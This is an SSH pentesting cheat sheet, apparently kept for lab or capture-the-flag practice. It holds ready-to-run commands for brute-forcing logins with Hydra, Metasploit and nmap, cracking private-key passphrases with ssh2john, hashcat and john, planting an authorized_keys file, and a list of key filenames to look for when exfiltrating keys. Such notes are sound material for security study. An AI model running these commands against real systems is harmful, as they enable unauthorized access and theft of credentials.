22 - SSH

Usage

Inline Cmds

ssh user1@10.10.10.10 -p 2222 'ls /home/user1/'

scp

# Local to remote (upload)
scp file1 user@172.16.10.10:/tmp/file1

# Remote to local (download)
scp user@172.16.10.10:/tmp/file1 ./file1

If error messages pop up, try -O:

$ scp -i id_rsa ./authorized_keys bob@sorc:/home/bob/.ssh/authorized_keys
scp: Received message too long 1094927173
scp: Ensure the remote shell produces no output for non-interactive sessions.

$ scp -O -i id_rsa ./authorized_keys bob@sorc:/home/bob/.ssh/authorized_keys

Auth Methods

Supported authentication methods.

nmap -p22 -script=ssh-auth-methods <IP>

Audit

$ ssh-audit 192.168.0.24
# general
(gen) banner: SSH-1.99-OpenSSH_2.9p2
(gen) protocol SSH1 enabled
(gen) software: OpenSSH 2.9p2
(gen) compatibility: OpenSSH 2.5.0-6.6, Dropbear SSH 0.47-0.52
(gen) compression: enabled (zlib)

<SNIP>

Brute Force

Hydra

hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.0.24:22 -t 4

Metasploit

$ msfconsole -q
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
PASS_FILE => /usr/share/wordlists/metasploit/unix_passwords.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/ssh/ssh_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.57.134
RHOSTS => 192.168.57.134

Nmap

nmap -p 22 --script ssh-brute potato

PPK to PEM

Convert a Putty user key file (.ppk) to an SSH .pem file.

# Converting PPK to PEM
sudo puttygen key.ppk -O private-openssh -o key.pem
# Assigning the appropriate permissions
sudo chmod 600 key.pem
# Confirming permissions
ls -l key.pem
# Using public key authentication
ssh root@10.10.11.227 -i key.pem

For an example of the above process check Keeper.

Private Keys

1. Convertion

# converting the private key into a hashcat-friendly format
$ ssh2john id_rsa > ssh.hash

2. Formatting

$ cat ssh.hash
id_rsa:$sshng$6$16$7059e78a8d3764ea1e883fcdf592feb7$1894$6f70656e737<SNIP>

# removing the 'id_rsa' username
$ nano ssh.hash
$ cat ssh.hash
$sshng$6$16$7059e78a8d3764ea1e883fcdf592feb7$1894$6f70656e737<SNIP>

3. Cracking

$ hashcat -h | grep -i "ssh" 
<SNIP>
22921 | RSA/DSA/EC/OpenSSH Private Keys ($6$) | Private Key

# might not work
$ hashcat -m 22921 ssh.hash ssh.passwords
# this will probably work
$ john --wordlist=ssh.passwords ssh.hash

Key Types

SSH supports multiple key types, each with a default filename, thus, when trying to exfiltrate one don't just search for id_rsa!

Key Type	Private Key File	Public Key File
RSA	~/.ssh/id_rsa	~/.ssh/id_rsa.pub
ECDSA	~/.ssh/id_ecdsa	~/.ssh/id_ecdsa.pub
ED25519	~/.ssh/id_ed25519	~/.ssh/id_ed25519.pub
DSA (old)	~/.ssh/id_dsa	~/.ssh/id_dsa.pub

• ECDSA and ED25519 are newer and generally faster/smaller than RSA.

• ED25519 is currently the recommended default for many systems (ssh-keygen defaults to it now).

• RSA is still widely supported, but 4096-bit keys are preferred now due to security standards.